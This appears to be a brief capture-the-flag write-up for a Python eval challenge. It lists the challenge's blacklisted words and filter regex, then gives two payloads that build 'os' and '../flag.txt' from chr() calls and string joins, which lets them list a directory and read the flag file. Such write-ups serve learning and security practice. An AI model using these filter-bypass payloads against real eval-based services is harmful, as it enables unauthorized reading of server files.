Skip to content

3v@l

Blacklisted words: os,eval,exec,bind,connect,python,socket,ls,cat,shell,bind

Regex to bypass: r'0x[0-9A-Fa-f]+|\u[0-9A-Fa-f]{4}|%[0-9A-Fa-f]{2}|.[A-Za-z0-9]{1,3}\b|[\\/]|..'

  • 0x[0-9A-Fa-f]+: Hexadecimal numbers prefixed with 0x
  • \\u[0-9A-Fa-f]{4} : Unicode escape sequences in the \uXXXX format
  • %[0-9A-Fa-f]{2} : URL-encoded characters in the %XX format
  • \.[A-Za-z0-9]{1,3}\b : File extensions of 1 to 3 alphanumeric characters preceded by a dot
  • [\\\/] : Backslash or forward slash
  • \.\. : ..
__import__(chr(111)+chr(115)).listdir('.'+'.')
# os.listdir('..')

open('.'+'.'+chr(47)+'flag.'+'txt').read()
# open(../flag.txt).read()